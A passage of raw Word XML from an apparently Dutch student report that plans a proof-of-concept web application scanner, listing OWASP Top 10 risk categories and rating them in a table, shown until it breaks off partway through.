      </w:pPr>
      <w:r w:rsidRPr="00E12430">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">A2 Broken Authentication </w:t>
      </w:r>
      <w:r w:rsidR="00017CA0" w:rsidRPr="00E12430">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12430">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session Management (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C2391" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="00E12430" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12430">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A3 Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D4C6B" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE19A9">
        <w:t>A4 Ins</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Direct Object References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43495713" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E4233" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A6 Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E979D" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A7 Missing Function Level Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB29E4" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A8 Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2F116" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="007D65B3" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D65B3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A9 Using Components with Known Vulnerabilities Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1364F" w14:textId="6BB9CC2D" w:rsidR="003B11B2" w:rsidRDefault="00A0171A" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Underprotected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> API’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E2264A" w14:textId="72E7630E" w:rsidR="0022176D" w:rsidRPr="0022176D" w:rsidRDefault="0022176D" w:rsidP="0022176D">
      <w:r w:rsidRPr="0022176D">
        <w:t>De definities kun je vinden in de bijlage</w:t>
      </w:r>
      <w:r w:rsidR="00E15DAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E15DAB">
        <w:t>OWASP top</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E15DAB">
        <w:t xml:space="preserve"> tien</w:t>
      </w:r>
      <w:r w:rsidR="0001685A">
        <w:t xml:space="preserve"> (Bijlage A)</w:t>
      </w:r>
      <w:r w:rsidRPr="0022176D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112525F" w14:textId="40C79529" w:rsidR="001F67DC" w:rsidRDefault="00D00CDA">
      <w:r>
        <w:t xml:space="preserve">OWASP heeft in detail beschreven </w:t>
      </w:r>
      <w:r w:rsidR="00BC6F02">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>wat elke risico is</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F02">
        <w:t xml:space="preserve">, of je </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F02">
        <w:t xml:space="preserve"> kwetsbaar is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en hoe het te v</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F02">
        <w:t>oorkomen is”?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F7FEA">
        <w:t xml:space="preserve">Dit informatie is cruciaal voor het ontwikkelen van een </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="009F7FEA">
        <w:t xml:space="preserve"> scanner want, het geeft een aan op welke risico’s er minimaal gescand moeten worden. Het is net een criteria lijst </w:t>
      </w:r>
      <w:r w:rsidR="002E4BF3">
        <w:t xml:space="preserve">voor een </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="002E4BF3">
        <w:t xml:space="preserve"> scanner. Nu is het een moeilijke taak om binnen de gekregen tijd al deze risico’s te implementeren in de </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="002E4BF3">
        <w:t xml:space="preserve"> scanner die ik ga ontwikkelen. </w:t>
      </w:r>
      <w:r w:rsidR="009F7FEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE763A">
        <w:t xml:space="preserve">Omdat ik een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE763A">
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE763A">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE763A">
        <w:t>Conecpt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471568">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E346A">
        <w:t xml:space="preserve">en daarom geen uitgebreide </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="009E346A">
        <w:t xml:space="preserve"> scanner hoef te ontwikkelen </w:t>
      </w:r>
      <w:r w:rsidR="00AE763A">
        <w:t xml:space="preserve">zal ik </w:t>
      </w:r>
      <w:r w:rsidR="009E346A">
        <w:t>maar een selectie van de meest voorkomende risico</w:t>
      </w:r>
      <w:r w:rsidR="00095C8E">
        <w:t>’s implementeren.</w:t>
      </w:r>
      <w:r w:rsidR="00EE49FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t>Om deze selectie te kunnen maken zal ik kijken naar hoe vaak een risico</w:t>
      </w:r>
      <w:r w:rsidR="007F0372">
        <w:t xml:space="preserve"> voorkomt</w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t>, hoe makkelijk het exploiteerbaar is, wat de impact is op applicatie niveau en business niveau en wat de moeilijkheidsgraad i</w:t>
      </w:r>
      <w:r w:rsidR="00847276">
        <w:t xml:space="preserve">s voor het implementeren van het identificeren van de </w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t xml:space="preserve">kwetsbaarheid binnen het </w:t>
      </w:r>
      <w:r w:rsidR="00733C80">
        <w:t>softwaresysteem</w:t>
      </w:r>
      <w:r w:rsidR="004738CE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B4983">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="704"/>
        <w:gridCol w:w="2034"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1451"/>
        <w:gridCol w:w="1441"/>
        <w:gridCol w:w="1788"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A6DC7" w14:paraId="685392DE" w14:textId="77777777" w:rsidTr="00245746">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2344BF3C" w14:textId="573D5CC1" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C3ADFA" w14:textId="5F177DDF" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:r>
              <w:t>Vaak voorkomend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF63725" w14:textId="0A66FEB2" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:r>
              <w:t>Exploiteerbaar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69AE72C9" w14:textId="1B928F66" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:r>
              <w:t>Impact software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64767C08" w14:textId="394BD7EE" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:r>
              <w:t>Impact business</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30813824" w14:textId="4D32EDFC" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>moeilijkheidsgraad</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="7C522CDA" w14:textId="77777777" w:rsidTr="00E73890">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2290F5AD" w14:textId="6A9D554D" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="69364E06" w14:textId="66F60FA8" w:rsidR="001A6DC7" w:rsidRDefault="0001685A">
            <w:r>
              <w:t>Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="635C344A" w14:textId="6208A632" w:rsidR="001A6DC7" w:rsidRDefault="0001685A">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="634EDB3D" w14:textId="2ACA2EF1" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t xml:space="preserve">Zeer </w:t>
            </w:r>
            <w:r w:rsidR="0001685A">
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="633DA3A0" w14:textId="41B88434" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t xml:space="preserve">Zeer </w:t>
            </w:r>
            <w:r w:rsidR="0001685A">
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4EBB239D" w14:textId="14F78A54" w:rsidR="001A6DC7" w:rsidRDefault="00741CC0">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="19DD8750" w14:textId="77777777" w:rsidTr="00245746">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="275C2149" w14:textId="63F13C47" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778F99D5" w14:textId="0CD74940" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0D7D48" w14:textId="425E280B" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F8C2B91" w14:textId="7EFDBA2C" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F702F8C" w14:textId="0E4EC78C" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDCC77A" w14:textId="12691275" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="48BAF73B" w14:textId="77777777" w:rsidTr="00E73890">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7FD9465D" w14:textId="74421963" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="629CC26E" w14:textId="735D5E0E" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Heel vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="32DBE2E8" w14:textId="4A3C441F" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="389CBC2B" w14:textId="08C4DE2E" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6FEB87F3" w14:textId="351100AD" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="39CB564F" w14:textId="5B328B7D" w:rsidR="001A6DC7" w:rsidRDefault="00E2354C">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="52FD85A3" w14:textId="77777777" w:rsidTr="00245746">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79E64B9E" w14:textId="2F0429E2" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47AB66CD" w14:textId="0D24318D" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1593B48C" w14:textId="5A38A2FD" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E820BD1" w14:textId="40FDA912" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E0C2A2A" w14:textId="5FFAB785" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73BA73E8" w14:textId="49034ED0" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="576A1E36" w14:textId="77777777" w:rsidTr="007118F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ACD30D4" w14:textId="2A7710CC" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62FCAFE1" w14:textId="6D478A57" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">
            <w:r>
              <w:t>Heel Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F439A3" w14:textId="78EBF746" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E53CF19" w14:textId="0ED13A02" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303CC45B" w14:textId="3DE6910B" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26459B78" w14:textId="52A35BE6" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="5B01E428" w14:textId="77777777" w:rsidTr="00245746">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D3D08F3" w14:textId="43F1D8EB" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D15F2BC" w14:textId="3D7C821D" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0DC619" w14:textId="3BF6BDF7" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2175A8F1" w14:textId="01681D03" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39DEE2C5" w14:textId="7B2153DE" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36AE6267" w14:textId="0F7E35D5" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="09372BC0" w14:textId="77777777" w:rsidTr="00245746">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7D030F" w14:textId="26FB0A7B" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="729AAB18" w14:textId="4ADAD04F" w:rsidR="001A6DC7" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A2AC62" w14:textId="3D53317C" w:rsidR="001A6DC7" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BBFE66" w14:textId="0C653C21" w:rsidR="001A6DC7" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381B5DE1" w14:textId="1A7484B0" w:rsidR="001A6DC7" w:rsidRDefault="00A51EA9">
            <w:r>
              <w:t>Gemiddeld</w:t>
